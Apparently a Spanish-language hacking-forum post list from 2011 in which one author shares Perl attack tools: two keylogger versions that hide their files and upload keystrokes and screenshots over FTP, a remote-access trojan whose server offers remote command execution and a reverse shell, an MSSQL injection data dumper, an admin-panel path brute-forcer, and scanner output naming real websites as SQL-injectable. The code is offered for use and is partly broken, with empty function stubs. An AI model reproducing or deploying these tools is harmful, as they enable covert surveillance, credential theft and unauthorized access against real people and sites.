| |
|
484
|
Programación / Scripting / [Perl] Keycagator 0.7
|
en: 9 Octubre 2011, 17:51 pm
|
Hola a todos , aca les traigo la nueva version de este keylogger En esta version ya es aceptable con las siguientes opciones - Captura letras reconociendo mayusculas y minusculas
- Captura ventanas en la que se trabaja
- Toma fotos del sistema cada 1 minuto
- Sube logs y fotos tomadas por FTP
- Oculta rastros
#!usr/bin/perl #KeyCagator 0.7 (C) Doddy Hackman 2011 # use Win32::API; use Win32 ::GuiTest qw(GetForegroundWindow GetWindowText FindWindowLike SetForegroundWindow SendKeys ); use Win32::Clipboard; use threads; use Net::FTP; use Win32::File; use Cwd; my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I"); my $tengo = 0; if ($^O eq 'MSWin32') { use Win32::Console; Win32::Console::Free(); } hideit($0,"hide"); subirftp("logs.txt","logs.txt"); my $comando1 = threads->new(\&capture_windows); my $comando2 = threads->new(\&capture_keys); my $comando3 = threads->new(\&capture_screen); $comando1->join(); $comando2->join(); $comando3->join(); sub capture_windows { while(1) { my $win1 = GetForegroundWindow(); my $win2 = GetForegroundWindow(); if($win1 != $win2){ my $nombre = GetWindowText($win1); if ($nombre ne "") { #print "\n\n[".$nombre."]\n\n"; savefile("logs.txt","\n\n[".$nombre."]\n\n"); } } } } sub capture_keys { while(1) { my $test1; my $test2; for my $num(0x30..0x39) { #Numbers if (dame($num)) { #print "number : ".chr($num)."\n"; savefile ("logs.txt",chr($num));} } if (dame(0x14)) { $test1 = 1; $tengo++; } for my $num(0x41..0x5A) { #Words if (dame($num)) { if (dame(0x20)) { savefile("logs.txt"," "); } if (dame(0x32)) { savefile("logs.txt","\n[enter]\n\n"); } unless (verpar($tengo) eq 1) { #print "MAYUSCULA : ".chr($num)."\n"; savefile ("logs.txt",chr($num));} if (dame(0x10) or dame(0xA0) or dame(0xA1)) { #print "MAYUSCULA : ".chr($num)."\n"; $test2 = 1; } unless ($test1 eq 1 or $test2 eq 1) { if ($num >= 0x41) { if ($num <= 0x5A) { if (verpar($tengo) eq 1) { #print "MINUSCULA : ".chr($num+32)."\n"; savefile ("logs.txt",chr($num+32));} } } } } } } } sub capture_screen { $numero = 0; while(1) { $numero++; SetForegroundWindow(1); SendKeys('%{PRTSCR}'); my $a = Win32::Clipboard::GetBitmap(); open (FOTO ,">".$numero.".bmp"); hideit($numero.".bmp","hide"); subirftp($numero.".bmp",$numero.".bmp"); } } sub dame { } sub savefile { hideit($_[0],"hide"); } sub hideit { if ($_[1] eq "show") { Win32::File::SetAttributes($_[0],NORMAL); } elsif ($_[1] eq "hide") { Win32::File::SetAttributes($_[0],HIDDEN); } else { } } sub subirftp { if ($ser = Net::FTP->new("localhost")) { if ($ser->login("doddy","123")) { print "subi".getcwd ()."/".$_[0]."\n"; if ($ser->put(getcwd()."/".$_[0],$_[1])) { } } $ser->close; } } sub verpar{ return ($_[0] % 2 == 0) ? "1" : "2"; } #Credits : to explorer for helpme with the function verpar() #Mail : lepuke[at]hotmail[com] #Blog : doddy-hackman.blogspot.com # ¿ The End ?
|
|
|
|
|
485
|
Programación / Scripting / [Perl] KeyCagator 0.4
|
en: 9 Octubre 2011, 17:50 pm
|
Bueno , este es un keylogger en perl que hice con las siguientes opciones * Captura teclas reconociendo mayusculas y minusculas * Muestra ventanas en las que se esta trabajando Pocas opciones pero mejor la version anterior #!usr/bin/perl #KeyCagator 0.4 (C) Doddy Hackman 2010 # use Win32::API; use Win32 ::GuiTest qw(GetForegroundWindow GetWindowText ); my $come = new Win32::API("user32", "GetAsyncKeyState","N", "I"); my $tengo = 0; if ($^O eq 'MSWin32') { use Win32::Console; Win32::Console::Free(); } while (true) { capture_windows(); capture_keys(); } sub capture_windows { my $win1 = GetForegroundWindow(); my $win2 = GetForegroundWindow(); if($win1 != $win2){ my $nombre = GetWindowText($win1); if ($nombre ne "") { #print "\n\n[".$nombre."]\n\n"; savefile("logs.txt","\n\n[".$nombre."]\n\n"); } } } sub capture_keys { my $test1; my $test2; capture_windows(); for my $num(0x30..0x39) { #Numbers capture_windows(); if (dame($num)) { #print "number : ".chr($num)."\n"; savefile ("logs.txt",chr($num));} } if (dame(0x14)) { $test1 = 1; $tengo++; } for my $num(0x41..0x5A) { #Words capture_windows(); if (dame($num)) { if (dame(0x0d)) { savefile("logs.txt","\n\n[enter]\n\n"); } unless (verpar($tengo) eq 1) { #print "MAYUSCULA : ".chr($num)."\n"; savefile ("logs.txt",chr($num));} if (dame(0x10) or dame(0xA0) or dame(0xA1)) { #print "MAYUSCULA : ".chr($num)."\n"; $test2 = 1; } unless ($test1 eq 1 or $test2 eq 1) { if ($num >= 0x41) { if ($num <= 0x5A) { if (verpar($tengo) eq 1) { #print "MINUSCULA : ".chr($num+32)."\n"; savefile ("logs.txt",chr($num+32));} } } } } } } sub dame { } sub savefile { } sub verpar{ return ($_[0] % 2 == 0) ? "1" : "2"; } #Credits : to explorer for helpme with the function verpar() #Mail : lepuke[at]hotmail[com] #Blog : doddy-hackman.blogspot.com # ¿ The End ?
|
|
|
|
|
486
|
Programación / Scripting / [Perl] Manager
|
en: 9 Octubre 2011, 17:50 pm
|
Bueno , aca les traigo un programa que los ayudara a listar todos los procesos y cerrar el que quieran En esta version podran tener una interfaz grafica #!usr/bin/perl #Manager (C) Doddy Hackman 2010 #Module neccesary #ppm install http://trouchelle.com/ppm/Win32-Process-List.ppd use Win32::Process::List; use Win32::Process; use Tk; if ($^O eq 'MSWin32') { use Win32::Console; Win32::Console::Free(); } $new = MainWindow->new(-background=>"black"); $new->geometry("250x300+20+20"); $new->resizable(0,0); $new->title("Manager 0.1"); $new->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Process")->pack(); my $lists = $new->Listbox(-background =>"black",-foreground =>"green")->place(-y=>"50",-x =>"60"); $new->Button(-background =>"black",-foreground =>"green",-text =>"Close",-activebackground =>"green",-width =>"40",-command =>\&close)->place(-y=>"218"); $new->Button(-background =>"black",-foreground =>"green",-text =>"Refresh",-width =>"40",-activebackground =>"green",-command =>\&refresh)->place(-y=>"240"); $new->Button(-background =>"black",-foreground =>"green",-text =>"About",-width =>"40",-activebackground =>"green",-command =>\&about)->place(-y=>"263"); &refresh; MainLoop; sub refresh { my @pids; my @procer; my $limit; $lists->delete(0.0,"end"); my $new = Win32::Process::List->new(); my %process = $new->GetProcesses(); my $limit = -1; for my $pid (keys %process) { $limit++; push (@procer,$process{$pid}); } for my $n(0..$limit) { $lists->insert("end",$procer[$n]); } } $d = $lists->curselection(); for my $id (@$d) { my $proceso = $lists->get($id); my $pida = Win32::Process::List->new(); my @pid = $pida->GetProcessPid($proceso); Win32::Process::KillProcess(@pid[1],$proceso); &refresh(); } } sub about { $about = MainWindow->new(-background=>"black"); $about->title("About"); $about->geometry("150x100+20+20"); $about->resizable(0,0); $about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"Coded By Doddy H")->pack(); $about->Label(-background=>"black",-foreground=>"green")->pack(); $about->Label(-background=>"black",-foreground=>"green",-font=>"Impact",-text=>"2011")->pack(); } # ¿ The End ?
|
|
|
|
|
487
|
Programación / Scripting / [Perl] MSSQL T00l
|
en: 9 Octubre 2011, 17:47 pm
|
Bueno , aca les traigo una tool en perl para buscar tablas y columnas con information_schema en MSSQL Tambien pueden sacar los valores que quieren de las columnas. #!usr/bin/perl #MSSQL T00l #(C) Doddy Hackman 2011 use LWP::UserAgent; use HTTP::Request::Common; my $nave = LWP::UserAgent->new(); $nave->timeout(13); $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); sub head { @@ @@ @@@@ @@@@ @@@ @@ @@@@@@ @@@ @@@ @@ @@@ @@@ @@ @ @@ @ @@@@@ @@ @@ @@@@@ @@@@@ @@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@@@@@@@ @@@ @@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@@@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @@ @ @@ @ @@ @@@@@ @@ @@ @@@@@ @@@@@ @@ @@ @@ @@ @@@@ @@@@ @@@@@ @@@@ @@ @@@ @@@ @@@@ ); } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; <stdin>; } repe(); sub repe { head(); $code = toma($page); if ($code=~/ODBC SQL Server Driver/ig or $code=~/Microsoft OLE DB Provider/ig) { print "\n\n[+] The page is vulnerable to MSSQL Injection\n\n"; } else { print "\n\n[-] Not vulnerable\n\n"; #copyright(); } menu: ################################## 1 - Dump tables 2 - Dump Columns of the a table 4 - Change target 5 - Exit ################################## ); if ($op eq 1) { print "\n\n[*] Dumping tables...\n\n"; mssql_tables($page); } elsif ($op eq 2) { chomp (my $tab = <stdin>); print "\n\n[*] Dumping columns..\n\n"; mssql_columns($page,$tab); } elsif($op eq 3) { print "\n\n[*] Dumping values..\n\n"; mssql_data($page,$tab,$col); } elsif ($op eq 4) { repe(); } elsif ($op eq 5) { copyright(); } else { } #@tables = mssql_tables("http://www.12manage.com/profile.asp?m=drarupbarman'","Users"); sub mssql_columns { ($pass1,$pass2) = bypass("--"); my $sir; for (1..666) { $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."column_name".$pass1."from".$pass1."information_schema.columns".$pass1."where".$pass1."table_name="."'".$_[1]."'".$pass1."and".$pass1."column_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2; $code = toma($_[0].$path); if ($code=~/value '(.*?)' to/ig) { $sir.= ",'".$1."'"; print "[Column found : $1]\n"; } else { print "\n\n[+] Finish\n"; last; } } } sub mssql_tables { ($pass1,$pass2) = bypass("--"); my $sir; for (1..666) { $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1."table_name".$pass1."from".$pass1."information_schema.tables".$pass1."where".$pass1."table_name".$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2; #print "$path\n"; $code = toma($_[0].$path); if ($code=~/value '(.*?)' to/ig) { $sir.= ",'".$1."'"; print "[Table found : $1]\n"; } else { print "\n\n[+] Finish\n"; last; } } } sub mssql_data { ($pass1,$pass2) = bypass("--"); my $sir; for (1..666) { $path = $pass1."and".$pass1."1=convert(int,("."select".$pass1."top".$pass1."1".$pass1.$_[2].$pass1."from".$pass1.$_[1].$pass1."where".$pass1.$_[2].$pass1."not".$pass1."in".$pass1."(''$sir)))".$pass2; #print "$path\n"; $code = toma($_[0].$path); if ($code=~/value '(.*?)' to/ig) { $sir.= ",'".$1."'"; print "[Data found : $1]\n"; } else { print "\n\n[+] Finish\n"; last; } } } } sub bypass { if ($_[0] eq "/*") { return ("/**/","/*"); } elsif ($_[0] eq "%20") { return ("%20","%00"); } sub toma { return $nave->request(GET $_[0])->content; } # ¿ The End ?
|
|
|
|
|
488
|
Programación / Scripting / [Perl] Troyano Nefaster
|
en: 9 Octubre 2011, 17:47 pm
|
Bueno es es mi troyano Nefaster , en esta version le arregle varias cosas que pasare a detallar - Mostrar Informacion
- Navegador de archivos
- Cambiar directorio de navegacion
- Crear archivo
- Borrar archivo
- Borrar directorio
- Reproducir musica o videos poniendo la ruta en la opcion
- Parar reproduccion
- Abrir lectora de CD
- Cerrar lectora de CD
- Puertos abiertos
- Mensaje
- Ejecutar comandos
- Esconder barra de tareas
- Devolver barra de tareas
- Esconder iconos del escritorio
- Devolver iconos del escritorio
- Administrar procesos con posibilidad de cerrar el que quieran
- Reverse Shell si es que quieren ejecutar comandos de forma mas comoda
El codigo del cliente es este #!usr/bin/perl #Nefester (Cliente) 0.1 By Doddy H use IO::Socket; use Cwd; &menu; sub head { E F TT E NNNNNNNEEEEEE FFFFFF AAA SSSSSTTTTTTEEEEEE RRRRRR NN NN E EE FFFF A AA S S T TT T E EE RRRRR NNNNN E EE FF F AAAAA S T TT E EE RR R NNNNN EEEEE FFFFF AAA AA SSS S TT EEEEE RRRRR NNNNN E EEE FFF AAAAA S SSS TT E EEE RR R NN NN EEEE E FF AAA AA SS SS TT EEEE E RR R NNN NN EEEEEEEFFFF AAA AAA SSS TTTT EEEEEEE RRR RR SS R R ); } sub menu { &head; my $socket = new IO::Socket::INET( PeerAddr => $ip, PeerPort => 666, Proto => 'tcp', Timeout => 5 ); if ($socket) { $socket->close; &menuo($ip); } else { print "\n\n[-] Target no infectado\n"; <STDIN>; &menu; } } sub menuo { &head; print "[$_[0]] : Servidor Activado\n\n"; 1 : Informacion 2 : Navegador 3 : Abrir CD 4 : Cerrar CD 5 : Puertos abiertos 6 : Mensaje 7 : CMD 8 : Esconder barra de tareas 9 : Devolver barra de tareas 10 : Esconder iconos 11 : Devolver iconos 12 : Administrar procesos 13 : Reverse Shell 14 : Cambiar IP 15 : Salir ); chomp(my $opcion = <STDIN>); if ($opcion eq 1) { print "\n\n[+] Informacion\n\n"; $re = daryrecibir($_[0],"infor"); if ($re=~/:(.*):(.*):(.*):(.*):(.*):/) { print "[Dominio] : $1\n"; print "[Version] : $3\n"; <stdin>; } &menuo($_[0]); } elsif ($opcion eq 2) { menu1: print "\n\n[+] Navegacion de archivos\n\n"; $cwd = daryrecibir($_[0],"getcwd"."\r\n"); show($_[0],"/"); &menu2; sub menu2 { print "\n\n[Opciones]\n\n"; print "1 - Cambiar directorio\n"; print "2 - Crear archivo\n"; print "3 - Borrar archivo\n"; print "4 - Borrar directorio\n"; print "5 - Reproducir musica\n"; print "6 - Parar reproduccion\n"; print "7 - Volver al menu inicial\n\n"; if ($op eq 1) { print "\n\n[+] Directorio : "; $ver = daryrecibir($_[0],"chdirnow K0BRA".$dir."K0BRA"); if ($ver=~/ok/ig) { print "\n\n[+] Directory changed\n\n"; } show($_[0],$dir); &menu2; <stdin>; } elsif ($op eq 2) { chomp(my $name = <stdin>); print "\n\n[Contenido] : "; chomp(my $code = <stdin>); daryrecibir($_[0],"crearnow K0BRA".$name."K0BRA ACATOY".$code."ACATOY"); print "\n\n[+] Archivo creado \n\n"; <stdin>; } elsif ($op eq 3) { print "\n\n[Archivo a borrar] : "; chomp(my $file = <stdin>); $re = daryrecibir($_[0],"borrarfile K0BRA".$file."K0BRA"); if ($re=~/ok/) { print "\n\n[+] Archivo Borrado\n\n"; } else { print "\n\n[-] Error\n\n"; } <stdin>; } elsif ($op eq 4) { print "\n\n[Directorio a borrar] : "; chomp(my $file = <stdin>); $re = daryrecibir($_[0],"borrardir K0BRA".$file."K0BRA"); if ($re=~/ok/) { print "\n\n[+] Directorio Borrado\n\n"; } else { print "\n\n[-] Error\n\n"; } <stdin>; } elsif ($op eq 5) { print "\n\n[Archivo] : "; chomp(my $file = <stdin>); print "\n\n[+] Reproduciendo\n\n"; daryrecibir($_[0],"playmusic K0BRA".$file."K0BRA"); <stdin>; } elsif ($op eq 6) { print "\n\n[+] Reproduccion detenida\n\n"; daryrecibir($_[0],"pararmusic"); <stdin>; } elsif ($op eq 7) { &menuo($_[0]); } else { show($_[0],"/"); } } } elsif ($opcion eq 3) { daryrecibir($_[0],"opencd"); &menuo($_[0]); } elsif ($opcion eq 4) { daryrecibir($_[0],"closedcd"); &menuo($_[0]); } elsif ($opcion eq 5) { print "\n[Puertos Abiertos]\n\n"; $re = daryrecibir($_[0],"porters"); while ($re=~/:(.*?):/ig) { if ($1 ne "") { } } <stdin>; &menuo($_[0]); } elsif ($opcion eq 6) { chomp (my $msg = <stdin>); daryrecibir($_[0],"msgbox $msg"); <stdin>; &menuo($_[0]); } elsif ($opcion eq 7) { menu: my $cmd,$re; &menuo($_[0]); } $re = daryrecibir($_[0],"comando :$cmd:"); &menuo($_[0]); } elsif ($opcion eq 8) { daryrecibir($_[0],"iniciochau"); &menuo($_[0]); } elsif ($opcion eq 9) { daryrecibir($_[0],"iniciovuelve"); &menuo($_[0]); } elsif ($opcion eq 10) { daryrecibir($_[0],"iconochau"); &menuo($_[0]); } elsif ($opcion eq 11) { daryrecibir($_[0],"iconovuelve"); &menuo($_[0]); } elsif ($opcion eq 12) { &reload($_[0]); sub reload { my @pro; my @pids; my $sockex = new IO::Socket::INET( PeerAddr => $_[0], PeerPort => 666, Proto => 'tcp', Timeout => 5 ); print $sockex "mostrarpro"."\r\n"; $sockex->read($re,5000); $sockex->close; print "\n\n[+] Procesos encontrados\n\n"; while ($re=~/PROXEC(.*?)PROXEC/ig) { if ($1 ne "") { } } while ($re=~/PIDX(.*?)PIDX/ig) { if ($1 ne "") { } } for my $num(1..$cantidad) { if ($pro[$num] ne "") { print "\n[+] Proceso : ".$pro[$num]."\n"; print "[+] PIDS : ".$pids[$num]."\n"; } } [Opciones] 1 - Refrescar lista 2 - Cerrar procesos 3 - Volver al menu ); chomp(my $opc = <stdin>); if ($opc=~/1/ig) { &reload($_[0]); } elsif($opc=~/2/ig) { print "\n[+] Write the name of the process : "; chomp(my $numb = <stdin>); print "\n[+] Write the PID of the process : "; chomp(my $pid = <stdin>); $re = daryrecibir($_[0],"chauproce K0BRA".$pid."K0BRA".$numb."K0BRA"); if ($re=~/ok/ig) { print "\n\n[+] Proceso cerrado\n\n"; } else { print "\n\n[-] Error\n\n"; } <stdin>; &reload($_[0]); } elsif($opc=~/3/ig) { &menuo($_[0]); } else { &reload; } } } elsif ($opcion eq 13) { chomp(my $port = <stdin>); print "\n\n[+] Connected !!!\n\n"; $re = daryrecibir($_[0],"backshell :$ip:$port:"); } elsif ($opcion eq 14) { &menu; } elsif ($opcion eq 15) { } else { &menuo; } } sub daryrecibir { my $sockex = new IO::Socket::INET( PeerAddr => $_[0], PeerPort => 666, Proto => 'tcp', Timeout => 5 ); print $sockex $_[1]."\r\n"; $sockex->read($re,5000); $sockex->close; } sub show { my $re = daryrecibir($_[0],"getcwd"."\r\n"); print "\n\n[+] Directorio Actual : $re\n\n"; $re1 = daryrecibir($_[0],"dirnow ACATOY".$re."ACATOY"."\r\n"); print "\n\n[Directorios]\n\n"; while ($re1=~/DIREX(.*?)DIREX/ig) { if ($1 ne "") { } } print "\n\n[Archivos]\n\n"; while ($re1=~/FILEX(.*?)FILEX/ig) { if ($1 ne "") { } } } # # ¿ The End ? #
Y el server #!/usr/bin/perl #Nefester (sERVidor) 0.1 By Doddy H #Compilar con perl2exe para sacar consola use IO::Socket; use Socket; use Win32; use Cwd; use Win32::MediaPlayer; use Win32::Process::List; use Win32::Process; use Win32::API; use constant SW_HIDE => 0; use constant SW_SHOWNORMAL => 1; my $a = new Win32::API('user32', 'FindWindow', 'PP', 'N'); my $b = new Win32::API('user32', 'ShowWindow', 'NN', 'N'); $test = new Win32::MediaPlayer; my $sock = IO::Socket::INET->new(LocalPort => 666, Listen => 10, Proto => 'tcp', Reuse => 1); while (my $con = $sock->accept){ $resultado = <$con>; print "boludo mando : $resultado\n"; if ($resultado=~/msgbox (.*)/ig) { Win32::MsgBox($1,0,"Mensaje de Dios") } if ($resultado=~/backshell :(.*):(.*):/ig) { my ($ip,$port) = ($1,$2); print "conectando $ip con $port\n"; conectar($ip,$port); tipo(); sub conectar { connect(REVERSE , sockaddr_in ($_[1],inet_aton ($_[0]))); open (STDIN,">&REVERSE"); open (STDOUT,">&REVERSE"); open (STDERR,">&REVERSE"); } sub tipo { print "\n[*] Reverse Shell Starting...\n\n"; if ($^O =~/Win32/ig) { infowin(); } else { infolinux(); #root(); system("export TERM=xterm;exec sh -i"); } } sub infowin { print "[+] Domain Name : ".Win32 ::DomainName()."\n"; print "[+] OS Version : ".Win32 ::GetOSName()."\n"; print "[+] Username : ".Win32 ::LoginName()."\n\n\n"; } sub infolinux { print "[+] System information\n\n"; } } if ($resultado =~/opencd/ig) { use Win32::API; my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N"); my $rta = ' ' x 127; $ventana->Call('set CDAudio door open', $rta, 127, 0); } if ($resultado=~/chauproce K0BRA(.*)K0BRA(.*)K0BRA/ig) { my ($pid,$numb) = ($1,$2); if (Win32::Process::KillProcess($pid,$numb)) { } } if ($resultado =~/closedcd/ig) { use Win32::API; my $ventana = Win32::API->new("winmm", "mciSendString", "PPNN", "N"); my $rta = ' ' x 127; $ventana->Call('set CDAudio door closed', $rta, 127, 0); } if ($resultado=~/borrarfile K0BRA(.*)K0BRA/ig) { my $filex = $1; print getcwd ()."/".$filex."\n\n"; if (unlink(getcwd ()."/".$filex)) { } } if ($resultado=~/infor/ig) { use Win32; my $domain = Win32::DomainName(); my $chip = Win32::GetChipName(); my $version = Win32::GetOSVersion(); my $nombre = Win32::LoginName(); my $os = Win32::GetOSName(); print $con ":".$domain.":".$chip.":".$version.":".$nombre.":".$os.":"."\r\n"; } if ($resultado=~/porters/ig) { use Net::Netstat::Wrapper; $por = ""; @ports = Net::Netstat::Wrapper->only_port(); for(@ports) { $por = $por.":".$_; } } if ($resultado=~/playmusic K0BRA(.*)K0BRA/ig) { my $cancion = $1; $test->load($cancion); $test->play; } if ($resultado=~/chdirnow K0BRA(.*)K0BRA/ig) { my $dir = $1; } } if ($resultado=~/borrardir K0BRA(.*)K0BRA/ig) { my $veox = $1; if (rmdir(getcwd ()."/".$veox)) { } } if ($resultado=~/pararmusic/ig) { $test->close; } if ($resultado=~/dirnow ACATOY(.*)/ig) { my $real = $1; my @archivos = coleccionar($real); for (@archivos) { my $todo = $real."/".$_; if (-f $todo) { print $con "FILEX".$_."FILEX"."\r\n"; } if (-d $todo) { print $con "DIREX".$_."DIREX"."\r\n"; } } } sub coleccionar { } if ($resultado=~/getcwd/ig) { print "envie ".getcwd ()."\n\n"; print $con getcwd ()."\r\n"; } if ($resultado=~/mostrarpro/ig) { my $new = Win32::Process::List->new(); my %process = $new->GetProcesses(); for my $pid (keys %process) { print $con "PROXEC".$process{$pid}."PROXEC\r\n"; print $con "PIDX".$pid."PIDX\r\n"; } } if ($resultado=~/crearnow K0BRA(.*)K0BRA ACATOY(.*)ACATOY/ig) { my $name = $1; my $file = $2; print "name is $name end\n"; print "file is $file end\n"; } if ($resultado=~/comando :(.*):/ig) { print "llego comando $1\n"; } if ($resultado=~/iniciochau/g) { inicio_chau("Shell_TrayWnd"); } if ($resultado=~/iniciovuelve/g) { inicio_vuelve("Shell_TrayWnd"); } else { } if ($resultado=~/iconovuelve/g) { icono_vuelve("Program Manager"); } if ($resultado=~/iconochau/g) { icono_chau("Program Manager"); } sub icono_vuelve { $handle = $a->Call(0,$_[0]); $b->Call($handle,SW_SHOWNORMAL); } sub icono_chau { $handle = $a->Call(0,$_[0]); $b->Call($handle,SW_HIDE); } sub inicio_vuelve { $handlex = $a->Call($_[0],0); $b->Call($handlex,SW_SHOWNORMAL); } sub inicio_chau { $handlea = $a->Call($_[0],0); $b->Call($handlea,SW_HIDE); } } # ¿ The End ?
|
|
|
|
|
489
|
Programación / Scripting / [Perl] Panel Control 0.6
|
en: 8 Octubre 2011, 16:57 pm
|
La nueva version de esta herramienta para buscar el panel de administracion #!usr/bin/perl #Panel Control 0.6 #(C) Doddy Hackman 2011 use LWP::UserAgent; @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx' ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx' ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx' ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx' ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx' ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx' ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp' ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx' ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php' ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php' ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php' ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php' ,'administration/','administration/index.php','administration/login.php' ,'administrator/index.php','administrator/login.php','administrator/system.php','system/' ,'system/login.php','admin.php','login.php','administrador.php','administration.php' ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php' ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html' ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html' ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html' ,'administrator/','administrator/index.html','administrator/login.html' ,'administrator/account.html','administrator/account.php','administrator.html','login.html' ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php' ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/' ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html' ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp' ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp' ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp' ,'administrator/login.asp','administrator/account.asp','administrator.asp' ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp' ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/' ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php' ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp' ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html' ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html' ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp' ,'webadmin.html','administratie/','admins/','admins.php','admins.asp' ,'admins.html','administrivia/','Database_Administration/','WebAdmin/' ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/' ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/' ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/' ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/ ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/ ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/ ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/ ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/' ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/' ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/' ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/' ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/' ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/' ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/' ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/' ,'server/','database_administration/','power_user/','system_administration/' ,'ss_vms_admin_sm/'); my $nave = LWP::UserAgent->new; $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12"); $nave->timeout(5); head(); unless($ARGV[0]) { print "\n\n[+] sintax : $0 <web>\n\n"; } else { scan($ARGV[0]); } copyright(); sub scan { print "\n[+] Scanning $_[0]\n\n\n"; for $path(@panels) { $code = toma($_[0]."/".$path); if ($code->is_success) { print "[Link] : ".$_[0]."/".$path."\n"; } } } sub head { print "\n\n-- == Panel Control == --\n\n"; } sub copyright { print "\n\n(C) Doddy Hackman 2011\n\n"; } sub toma { } #Thanks to explorer (PerlEnEspañol) # ¿ The End ?
|
|
|
|
|
490
|
Programación / Scripting / [Perl] Paranoic Scan By Doddy H
|
en: 8 Octubre 2011, 16:56 pm
|
Hola. Hoy traigo un programa que eh estado haciendo porque estaba harto de ir probando cada web que encontraba en google para saber si tenia la vulnerabilidad que queria Asi que por eso hice esta tool , con las siguientes opciones * Permite scaner un archivo con webs * Permite buscar en google , borrar repes , y luego scanear Tipos de scan : * SQL * LFI * RFI * FULL SOURCE DISCLOURE Ejemplo de uso
@@@@@ @ @@@@ @ @@ @@@ @@@ @@@ @@@@ @@@ @@@@ @ @@ @@@
@ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@ @
@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @@ @
@@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @
@ @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @
@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@
@@@ @@@ @@@@@@ @@@@ @@@@@@ @ @@@ @@@ @@@ @@@ @@@ @@@ @@@@@@ @
[a] : Scan a File
[b] : Search in google and scan the webs
[option] : b
[+] Dork : ficha.php+id
[+] Pages : 200
[+] Scan Type :
[S] : SQL
[L] : LFI
[R] : RFI
[F] : Full Source Discloure
[A] : All
[Option] : s
[Google] : www.google.com.ar
[Dork] : ficha.php+id
[Pages] : 200
[+] Searching pages..
[+] Cleaning results
[Status] : Scanning
[Webs Count] : 136
[+] SQLI : http://www.3tres3.com/opinion/ficha.php?id=
[+] SQLI : http://www.vincipark.es/ficha.php?id=
[+] SQLI : http://www.maxhuber.cl/ficha.php?id=
[+] SQLI : http://www.alddeaviviendas.com/sitio/ficha.php?id=
[+] SQLI : http://www.bvocal.org/ficha.php?id=
[+] SQLI : http://www.animadas.com/artista-ficha.php?id=
[+] SQLI : http://www.madamedepompadour.cl/ficha.php?id=
[+] SQLI : http://codigo-civil.org/base/ficha.php?id=
